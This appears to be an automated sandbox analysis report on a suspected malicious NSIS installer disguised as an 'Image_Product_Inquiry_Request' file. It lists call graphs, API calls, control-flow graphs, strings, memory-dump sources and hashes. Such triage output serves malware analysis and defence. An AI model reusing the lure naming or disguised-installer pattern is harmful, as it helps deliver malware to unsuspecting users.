3964 405443 24 API calls 3961->3964 3961->3969 3963->3969 3966 405c98 3964->3966 3965 405aed 60 API calls 3965->3971 3968 4061a1 36 API calls 3966->3968 3967 405443 24 API calls 3967->3956 3968->3969 3969->3724 3969->3725 3970 405443 24 API calls 3970->3971 3971->3956 3971->3965 3971->3967 3971->3970 3972 4061a1 36 API calls 3971->3972 3974 4063db lstrcpynW 3971->3974 3975 405aa5 3971->3975 3972->3971 3973->3944 3974->3971 3976 405eac 2 API calls 3975->3976 3977 405ab1 3976->3977 3978 405ad2 3977->3978 3979 405ac0 RemoveDirectoryW 3977->3979 3980 405ac8 DeleteFileW 3977->3980 3978->3971 3981 405ace 3979->3981 3980->3981 3981->3978 3982 405ade SetFileAttributesW 3981->3982 3982->3978 3984 406057 3983->3984 3985 40607d GetShortPathNameW 3983->3985 4010 405ed1 GetFileAttributesW CreateFileW 3984->4010 3987 406092 3985->3987 3988 40619c 3985->3988 3987->3988 3990 40609a wsprintfA 3987->3990 3988->3894 3989 406061 CloseHandle GetShortPathNameW 3989->3988 3991 406075 3989->3991 3992 406418 17 API calls 3990->3992 3991->3985 3991->3988 3993 4060c2 3992->3993 4011 405ed1 GetFileAttributesW CreateFileW 3993->4011 3995 4060cf 3995->3988 3996 4060de GetFileSize GlobalAlloc 3995->3996 3997 406100 3996->3997 3998 406195 CloseHandle 3996->3998 3999 405f54 ReadFile 3997->3999 3998->3988 4000 406108 3999->4000 4000->3998 4012 405e36 lstrlenA 4000->4012 4003 406133 4006 405e36 4 API calls 4003->4006 4004 40611f lstrcpyA 4005 406141 4004->4005 4007 406178 SetFilePointer 4005->4007 4006->4005 4008 405f83 WriteFile 4007->4008 4009 40618e GlobalFree 4008->4009 4009->3998 4010->3989 4011->3995 4013 405e77 lstrlenA 4012->4013 4014 405e50 lstrcmpiA 4013->4014 4016 405e7f 4013->4016 4015 405e6e CharNextA 4014->4015 4014->4016 4015->4013 4016->4003 4016->4004 4488 40190f 4489 402d3e 17 API calls 4488->4489 4490 401916 4489->4490 4491 405a41 MessageBoxIndirectW 4490->4491 4492 40191f 4491->4492 4493 401491 4494 405443 24 API calls 4493->4494 4495 401498 4494->4495 4496 401f12 4497 402d3e 17 API calls 4496->4497 4498 401f18 4497->4498 4499 402d3e 17 API calls 4498->4499 4500 401f21 4499->4500 4501 402d3e 17 API calls 4500->4501 4502 401f2a 4501->4502 4503 402d3e 17 API calls 4502->4503 4504 401f33 4503->4504 4505 401423 24 API calls 4504->4505 4506 401f3a 4505->4506 4513 405a07 ShellExecuteExW 4506->4513 4508 401f82 4509 40687b 5 API calls 4508->4509 4510 402925 4508->4510 4511 401f9f CloseHandle 4509->4511 4511->4510 4513->4508 4514 402614 4515 402d3e 17 API calls 4514->4515 4516 40261b 4515->4516 4519 405ed1 GetFileAttributesW CreateFileW 4516->4519 4518 402627 4519->4518 4520 402596 4521 402d7e 17 API calls 4520->4521 4522 4025a0 4521->4522 4523 402d1c 17 API calls 4522->4523 4524 4025a9 4523->4524 4525 4025d1 RegEnumValueW 4524->4525 4526 4025c5 RegEnumKeyW 4524->4526 4528 402925 4524->4528 4527 4025e6 RegCloseKey 4525->4527 4526->4527 4527->4528 4530 401d17 4531 402d1c 17 API calls 4530->4531 4532 401d1d IsWindow 4531->4532 4533 401a20 4532->4533 3539 401b9b 3540 401bec 3539->3540 3542 401ba8 3539->3542 3541 401c16 GlobalAlloc 3540->3541 3544 401bf1 3540->3544 3545 406418 17 API calls 3541->3545 3546 401bbf 3542->3546 3549 401c31 3542->3549 3543 406418 17 API calls 3547 40238f 3543->3547 3552 402395 3544->3552 3560 4063db lstrcpynW 3544->3560 3545->3549 3558 4063db lstrcpynW 3546->3558 3561 405a41 3547->3561 3549->3543 3549->3552 3551 401c03 GlobalFree 3551->3552 3553 401bce 3559 4063db lstrcpynW 3553->3559 3556 401bdd 3565 4063db lstrcpynW 3556->3565 3558->3553 3559->3556 3560->3551 3562 405a56 3561->3562 3563 405aa2 3562->3563 3564 405a6a MessageBoxIndirectW 3562->3564 3563->3552 3564->3563 3565->3552 4541 402b9d SendMessageW 4542 402bc2 4541->4542 4543 402bb7 InvalidateRect 4541->4543 4543->4542 4544 404d9e GetDlgItem GetDlgItem 4545 404df2 7 API calls 4544->4545 4550 40501c 4544->4550 4546 404e9c DeleteObject 4545->4546 4547 404e8f SendMessageW 4545->4547 4548 404ea7 4546->4548 4547->4546 4551 404ede 4548->4551 4554 406418 17 API calls 4548->4554 4549 405104 4553 4051ad 4549->4553 4556 40500f 4549->4556 4562 40515a SendMessageW 4549->4562 4550->4549 4576 40508e 4550->4576 4598 404cec SendMessageW 4550->4598 4552 404331 18 API calls 4551->4552 4555 404ef2 4552->4555 4557 4051c2 4553->4557 4558 4051b6 SendMessageW 4553->4558 4559 404ec0 SendMessageW SendMessageW 4554->4559 4561 404331 18 API calls 4555->4561 4564 404398 8 API calls 4556->4564 4565 4051d4 ImageList_Destroy 4557->4565 4566 4051db 4557->4566 4573 4051eb 4557->4573 4558->4557 4559->4548 4577 404f03 4561->4577 4562->4556 4568 40516f SendMessageW 4562->4568 4563 4050f6 SendMessageW 4563->4549 4569 4053b0 4564->4569 4565->4566 4570 4051e4 GlobalFree 4566->4570 4566->4573 4567 405364 4567->4556 4574 405376 ShowWindow GetDlgItem ShowWindow 4567->4574 4572 405182 4568->4572 4570->4573 4571 404fde GetWindowLongW SetWindowLongW 4575 404ff7 4571->4575 4583 405193 SendMessageW 4572->4583 4573->4567 4591 405226 4573->4591 4603 404d6c 4573->4603 4574->4556 4578 405014 4575->4578 4579 404ffc ShowWindow 4575->4579 4576->4549 4576->4563 4577->4571 4582 404f56 SendMessageW 4577->4582 4584 404fd9 4577->4584 4585 404f94 SendMessageW 4577->4585 4586 404fa8 SendMessageW 4577->4586 4597 404366 SendMessageW 4578->4597 4596 404366 SendMessageW 4579->4596 4582->4577 4583->4553 4584->4571 4584->4575 4585->4577 4586->4577 4588 405330 4589 40533a InvalidateRect 4588->4589 4592 405346 4588->4592 4589->4592 4590 405254 SendMessageW 4593 40526a 4590->4593 4591->4590 4591->4593 4592->4567 4612 404ca7 4592->4612 4593->4588 4594 4052de SendMessageW SendMessageW 4593->4594 4594->4593 4596->4556 4597->4550 4599 404d4b SendMessageW 4598->4599 4600 404d0f GetMessagePos ScreenToClient SendMessageW 4598->4600 4601 404d43 4599->4601 4600->4601 4602 404d48 4600->4602 4601->4576 4602->4599 4615 4063db lstrcpynW 4603->4615 4605 404d7f 4616 406322 wsprintfW 4605->4616 4607 404d89 4608 40140b 2 API calls 4607->4608 4609 404d92 4608->4609 4617 4063db lstrcpynW 4609->4617 4611 404d99 4611->4591 4618 404bde 4612->4618 4614 404cbc 4614->4567 4615->4605 4616->4607 4617->4611 4619 404bf7 4618->4619 4620 406418 17 API calls 4619->4620 4621 404c5b 4620->4621 4622 406418 17 API calls 4621->4622 4623 404c66 4622->4623 4624 406418 17 API calls 4623->4624 4625 404c7c lstrlenW wsprintfW SetDlgItemTextW 4624->4625 4625->4614 4626 40149e 4627 402395 4626->4627 4628 4014ac PostQuitMessage 4626->4628 4628->4627 4629 4044a1 lstrlenW 4630 4044c0 4629->4630 4631 4044c2 WideCharToMultiByte 4629->4631 4630->4631 3391 402522 3402 402d7e 3391->3402 3394 402d3e 17 API calls 3395 402535 3394->3395 3396 402540 RegQueryValueExW 3395->3396 3399 402925 3395->3399 3397 402560 3396->3397 3398 402566 RegCloseKey 3396->3398 3397->3398 3407 406322 wsprintfW 3397->3407 3398->3399 3403 402d3e 17 API calls 3402->3403 3404 402d95 3403->3404 3405 406248 RegOpenKeyExW 3404->3405 3406 40252c 3405->3406 3406->3394 3407->3398 4632 404822 4633 40484e 4632->4633 4634 40485f 4632->4634 4693 405a25 GetDlgItemTextW 4633->4693 4636 40486b GetDlgItem 4634->4636 4668 4048ca 4634->4668 4638 40487f 4636->4638 4637 404859 4640 40668a 5 API calls 4637->4640 4641 404893 SetWindowTextW 4638->4641 4645 405d5b 4 API calls 4638->4645 4639 4049ae 4642 404b5d 4639->4642 4695 405a25 GetDlgItemTextW 4639->4695 4640->4634 4646 404331 18 API calls 4641->4646 4644 404398 8 API calls 4642->4644 4649 404b71 4644->4649 4650 404889 4645->4650 4651 4048af 4646->4651 4647 406418 17 API calls 4652 40493e SHBrowseForFolderW 4647->4652 4648 4049de 4653 405db8 18 API calls 4648->4653 4650->4641 4657 405cb0 3 API calls 4650->4657 4654 404331 18 API calls 4651->4654 4652->4639 4655 404956 CoTaskMemFree 4652->4655 4656 4049e4 4653->4656 4658 4048bd 4654->4658 4659 405cb0 3 API calls 4655->4659 4696 4063db lstrcpynW 4656->4696 4657->4641 4694 404366 SendMessageW 4658->4694 4661 404963 4659->4661 4664 40499a SetDlgItemTextW 4661->4664 4669 406418 17 API calls 4661->4669 4663 4048c3 4666 4067d0 5 API calls 4663->4666 4664->4639 4665 4049fb 4667 4067d0 5 API calls 4665->4667 4666->4668 4675 404a02 4667->4675 4668->4639 4668->4642 4668->4647 4671 404982 lstrcmpiW 4669->4671 4670 404a43 4697 4063db lstrcpynW 4670->4697 4671->4664 4672 404993 lstrcatW 4671->4672 4672->4664 4674 404a4a 4676 405d5b 4 API calls 4674->4676 4675->4670 4680 405cfc 2 API calls 4675->4680 4681 404a9b 4675->4681 4677 404a50 GetDiskFreeSpaceW 4676->4677 4679 404a74 MulDiv 4677->4679 4677->4681 4679->4681 4680->4675 4682 404b0c 4681->4682 4684 404ca7 20 API calls 4681->4684 4683 404b2f 4682->4683 4685 40140b 2 API calls 4682->4685 4698 404353 KiUserCallbackDispatcher 4683->4698 4686 404af9 4684->4686 4685->4683 4688 404b0e SetDlgItemTextW 4686->4688 4689 404afe 4686->4689 4688->4682 4691 404bde 20 API calls 4689->4691 4690 404b4b 4690->4642 4692 40477b SendMessageW 4690->4692 4691->4682 4692->4642 4693->4637 4694->4663 4695->4648 4696->4665 4697->4674 4698->4690 4699 4021a2 4700 402d3e 17 API calls 4699->4700 4701 4021a9 4700->4701 4702 402d3e 17 API calls 4701->4702 4703 4021b3 4702->4703 4704 402d3e 17 API calls 4703->4704 4705 4021bd 4704->4705 4706 402d3e 17 API calls 4705->4706 4707 4021c7 4706->4707 4708 402d3e 17 API calls 4707->4708 4710 4021d1 4708->4710 4709 402210 CoCreateInstance 4714 40222f 4709->4714 4710->4709 4711 402d3e 17 API calls 4710->4711 4711->4709 4712 401423 24 API calls 4713 4022ee 4712->4713 4714->4712 4714->4713 4715 4015a3 4716 402d3e 17 API calls 4715->4716 4717 4015aa SetFileAttributesW 4716->4717 4718 4015bc 4717->4718 3413 401fa4 3414 402d3e 17 API calls 3413->3414 3415 401faa 3414->3415 3416 405443 24 API calls 3415->3416 3417 401fb4 3416->3417 3428 4059c4 CreateProcessW 3417->3428 3420 401fdd CloseHandle 3423 402925 3420->3423 3424 401fcf 3425 401fd4 3424->3425 3426 401fdf 3424->3426 3436 406322 wsprintfW 3425->3436 3426->3420 3429 401fba 3428->3429 3430 4059f7 CloseHandle 3428->3430 3429->3420 3429->3423 3431 40687b WaitForSingleObject 3429->3431 3430->3429 3432 406895 3431->3432 3433 4068a7 GetExitCodeProcess 3432->3433 3437 40680c 3432->3437 3433->3424 3436->3420 3438 406829 PeekMessageW 3437->3438 3439 406839 WaitForSingleObject 3438->3439 3440 40681f DispatchMessageW 3438->3440 3439->3432 3440->3438 3521 40202a 3522 402d3e 17 API calls 3521->3522 3523 402031 3522->3523 3524 4067d0 5 API calls 3523->3524 3525 402040 GetFileVersionInfoSizeW 3524->3525 3526 402bc2 3525->3526 3527 40205c GlobalAlloc 3525->3527 3527->3526 3528 402070 3527->3528 3529 4067d0 5 API calls 3528->3529 3530 402077 3529->3530 3531 4067d0 5 API calls 3530->3531 3532 402081 3531->3532 3536 4020c4 3532->3536 3537 406322 wsprintfW 3532->3537 3534 4020b6 3538 406322 wsprintfW 3534->3538 3536->3526 3537->3534 3538->3536 4719 4023aa 4720 4023b2 4719->4720 4721 4023b8 4719->4721 4722 402d3e 17 API calls 4720->4722 4723 4023c6 4721->4723 4724 402d3e 17 API calls 4721->4724 4722->4721 4726 402d3e 17 API calls 4723->4726 4728 4023d4 4723->4728 4724->4723 4725 402d3e 17 API calls 4727 4023dd WritePrivateProfileStringW 4725->4727 4726->4728 4728->4725 4729 402f2b 4730 402f56 4729->4730 4731 402f3d SetTimer 4729->4731 4732 402fab 4730->4732 4733 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4730->4733 4731->4730 4733->4732 3566 40242c 3567 402434 3566->3567 3568 40245f 3566->3568 3569 402d7e 17 API calls 3567->3569 3570 402d3e 17 API calls 3568->3570 3571 40243b 3569->3571 3572 402466 3570->3572 3573 402445 3571->3573 3576 402473 3571->3576 3578 402dfc 3572->3578 3575 402d3e 17 API calls 3573->3575 3577 40244c RegDeleteValueW RegCloseKey 3575->3577 3577->3576 3579 402e10 3578->3579 3580 402e09 3578->3580 3579->3580 3582 402e41 3579->3582 3580->3576 3583 406248 RegOpenKeyExW 3582->3583 3584 402e6f 3583->3584 3585 402e7f RegEnumValueW 3584->3585 3592 402f19 3584->3592 3594 402ea2 3584->3594 3586 402f09 RegCloseKey 3585->3586 3585->3594 3586->3592 3587 402ede RegEnumKeyW 3588 402ee7 RegCloseKey 3587->3588 3587->3594 3589 4067d0 5 API calls 3588->3589 3590 402ef7 3589->3590 3590->3592 3593 402efb RegDeleteKeyW 3590->3593 3591 402e41 6 API calls 3591->3594 3592->3580 3593->3592 3594->3586 3594->3587 3594->3588 3594->3591 4734 406f2f 4736 40697e 4734->4736 4735 4072e9 4736->4735 4736->4736 4737 406a08 GlobalAlloc 4736->4737 4738 4069ff GlobalFree 4736->4738 4739 406a76 GlobalFree 4736->4739 4740 406a7f GlobalAlloc 4736->4740 4737->4735 4737->4736 4738->4737 4739->4740 4740->4735 4740->4736 4741 401a30 4742 402d3e 17 API calls 4741->4742 4743 401a39 ExpandEnvironmentStringsW 4742->4743 4744 401a4d 4743->4744 4746 401a60 4743->4746 4745 401a52 lstrcmpW 4744->4745 4744->4746 4745->4746 4759 401735 4760 402d3e 17 API calls 4759->4760 4761 40173c SearchPathW 4760->4761 4762 401757 4761->4762 4763 402636 4764 402665 4763->4764 4765 40264a 4763->4765 4767 402695 4764->4767 4768 40266a 4764->4768 4766 402d1c 17 API calls 4765->4766 4777 402651 4766->4777 4769 402d3e 17 API calls 4767->4769 4770 402d3e 17 API calls 4768->4770 4771 40269c lstrlenW 4769->4771 4772 402671 4770->4772 4771->4777 4780 4063fd WideCharToMultiByte 4772->4780 4774 402685 lstrlenA 4774->4777 4775 4026df 4776 4026c9 4776->4775 4778 405f83 WriteFile 4776->4778 4777->4775 4777->4776 4779 405fb2 5 API calls 4777->4779 4778->4775 4779->4776 4780->4774 4781 4053b7 4782 4053c7 4781->4782 4783 4053db 4781->4783 4784 405424 4782->4784 4785 4053cd 4782->4785 4786 4053e3 IsWindowVisible 4783->4786 4792 4053fa 4783->4792 4789 405429 CallWindowProcW 4784->4789 4787 40437d SendMessageW 4785->4787 4786->4784 4788 4053f0 4786->4788 4790 4053d7 4787->4790 4791 404cec 5 API calls 4788->4791 4789->4790 4791->4792 4792->4789 4793 404d6c 4 API calls 4792->4793 4793->4784 4801 401d38 4802 402d1c 17 API calls 4801->4802 4803 401d3f 4802->4803 4804 402d1c 17 API calls 4803->4804 4805 401d4b GetDlgItem 4804->4805 4806 402630 4805->4806 4807 4014b8 4808 4014be 4807->4808 4809 401389 2 API calls 4808->4809 4810 4014c6 4809->4810 4811 4028bb 4812 4028c1 4811->4812 4813 402bc2 4812->4813 4814 4028c9 FindClose 4812->4814 4814->4813

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 40348f-4034cc SetErrorMode GetVersion 1 4034ce-4034d6 call 4067d0 0->1 2 4034df 0->2 1->2 7 4034d8 1->7 4 4034e4-4034f8 call 406760 lstrlenA 2->4 9 4034fa-403516 call 4067d0 * 3 4->9 7->2 16 403527-403586 #17 OleInitialize SHGetFileInfoW call 4063db GetCommandLineW call 4063db 9->16 17 403518-40351e 9->17 24 403590-4035aa call 405cdd CharNextW 16->24 25 403588-40358f 16->25 17->16 21 403520 17->21 21->16 28 4035b0-4035b6 24->28 29 4036c1-4036db GetTempPathW call 40345e 24->29 25->24 30 4035b8-4035bd 28->30 31 4035bf-4035c3 28->31 38 403733-40374d DeleteFileW call 403015 29->38 39 4036dd-4036fb GetWindowsDirectoryW lstrcatW call 40345e 29->39 30->30 30->31 33 4035c5-4035c9 31->33 34 4035ca-4035ce 31->34 33->34 36 4035d4-4035da 34->36 37 40368d-40369a call 405cdd 34->37 42 4035f5-40362e 36->42 43 4035dc-4035e4 36->43 54 40369c-40369d 37->54 55 40369e-4036a4 37->55 56 403753-403759 38->56 57 4037fe-40380e call 4039d0 OleUninitialize 38->57 39->38 53 4036fd-40372d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40345e 39->53 49 403630-403635 42->49 50 40364b-403685 42->50 47 4035e6-4035e9 43->47 48 4035eb 43->48 47->42 47->48 48->42 49->50 58 403637-40363f 49->58 50->37 52 403687-40368b 50->52 52->37 59 4036ac-4036ba call 4063db 52->59 53->38 53->57 54->55 55->28 61 4036aa 55->61 62 4037ee-4037f5 call 403aaa 56->62 63 40375f-40376a call 405cdd 56->63 75 403934-40393a 57->75 76 403814-403824 call 405a41 ExitProcess 57->76 65 403641-403644 58->65 66 403646 58->66 68 4036bf 59->68 61->68 74 4037fa 62->74 79 4037b8-4037c2 63->79 80 40376c-4037a1 63->80 65->50 65->66 66->50 68->29 74->57 77 4039b8-4039c0 75->77 78 40393c-403952 GetCurrentProcess OpenProcessToken 75->78 88 4039c2 77->88 89 4039c6-4039ca ExitProcess 77->89 85 403954-403982 LookupPrivilegeValueW AdjustTokenPrivileges 78->85 86 403988-403996 call 4067d0 78->86 82 4037c4-4037d2 call 405db8 79->82 83 40382a-40383e call 4059ac lstrcatW 79->83 87 4037a3-4037a7 80->87 82->57 99 4037d4-4037ea call 4063db * 2 82->99 100 403840-403846 lstrcatW 83->100 101 40384b-403865 lstrcatW lstrcmpiW 83->101 85->86 102 4039a4-4039af ExitWindowsEx 86->102 103 403998-4039a2 86->103 93 4037b0-4037b4 87->93 94 4037a9-4037ae 87->94 88->89 93->87 98 4037b6 93->98 94->93 94->98 98->79 99->62 100->101 101->57 105 403867-40386a 101->105 102->77 106 4039b1-4039b3 call 40140b 102->106 103->102 103->106 108 403873 call 40598f 105->108 109 40386c-403871 call 405912 105->109 106->77 117 403878-403886 SetCurrentDirectoryW 108->117 109->117 118 403893-4038bc call 4063db 117->118 119 403888-40388e call 4063db 117->119 123 4038c1-4038dd call 406418 DeleteFileW 118->123 119->118 126 40391e-403926 123->126 127 4038df-4038ef CopyFileW 123->127 126->123 129 403928-40392f call 4061a1 126->129 127->126 128 4038f1-403911 call 4061a1 call 406418 call 4059c4 127->128 128->126 138 403913-40391a CloseHandle 128->138 129->57 138->126
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE ref: 004034B2
                                                                        • GetVersion.KERNEL32 ref: 004034B8
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
                                                                        • OleInitialize.OLE32(00000000), ref: 0040352F
                                                                        • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
                                                                        • GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000020,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000000,?,00000007,00000009,0000000B), ref: 00403598
                                                                          • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                          • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036D2
                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036EF
                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403703
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040370B
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371C
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403724
                                                                        • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403738
                                                                          • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                        • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
                                                                        • ExitProcess.KERNEL32 ref: 00403824
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403837
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403846
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403851
                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403879
                                                                        • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
                                                                        • CopyFileW.KERNEL32(00438800,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
                                                                        • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
                                                                        • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403982
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
                                                                        • ExitProcess.KERNEL32 ref: 004039CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener$C:\Users\user\AppData\Local\extrality\sheepgate\Adgangseksamener\Militrattacheens$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                        • API String ID: 3441113951-1560040505
                                                                        • Opcode ID: 8275754d50566e233e85ca8a4de4988e29cb555b5decd473ad68931de4119805
                                                                        • Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
                                                                        • Opcode Fuzzy Hash: 8275754d50566e233e85ca8a4de4988e29cb555b5decd473ad68931de4119805
                                                                        • Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 139 405582-40559d 140 4055a3-40566a GetDlgItem * 3 call 404366 call 404cbf GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40572c-405733 139->141 159 405688-40568b 140->159 160 40566c-405686 SendMessageW * 2 140->160 142 405735-405757 GetDlgItem CreateThread CloseHandle 141->142 143 40575d-40576a 141->143 142->143 145 405788-405792 143->145 146 40576c-405772 143->146 151 405794-40579a 145->151 152 4057e8-4057ec 145->152 149 405774-405783 ShowWindow * 2 call 404366 146->149 150 4057ad-4057b6 call 404398 146->150 149->145 163 4057bb-4057bf 150->163 156 4057c2-4057d2 ShowWindow 151->156 157 40579c-4057a8 call 40430a 151->157 152->150 154 4057ee-4057f4 152->154 154->150 161 4057f6-405809 SendMessageW 154->161 164 4057e2-4057e3 call 40430a 156->164 165 4057d4-4057dd call 405443 156->165 157->150 167 40569b-4056b2 call 404331 159->167 168 40568d-405699 SendMessageW 159->168 160->159 169 40590b-40590d 161->169 170 40580f-40583a CreatePopupMenu call 406418 AppendMenuW 161->170 164->152 165->164 178 4056b4-4056c8 ShowWindow 167->178 179 4056e8-405709 GetDlgItem SendMessageW 167->179 168->167 169->163 176 40583c-40584c GetWindowRect 170->176 177 40584f-405864 TrackPopupMenu 170->177 176->177 177->169 180 40586a-405881 177->180 181 4056d7 178->181 182 4056ca-4056d5 ShowWindow 178->182 179->169 183 40570f-405727 SendMessageW * 2 179->183 184 405886-4058a1 SendMessageW 180->184 185 4056dd-4056e3 call 404366 181->185 182->185 183->169 184->184 186 4058a3-4058c6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058c8-4058ef SendMessageW 186->188 188->188 189 4058f1-405905 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->169
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 004055E0
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004055EF
                                                                        • GetClientRect.USER32(?,?), ref: 0040562C
                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405633
                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
                                                                        • ShowWindow.USER32(?,00000008), ref: 004056CF
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004056F0
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004055FE
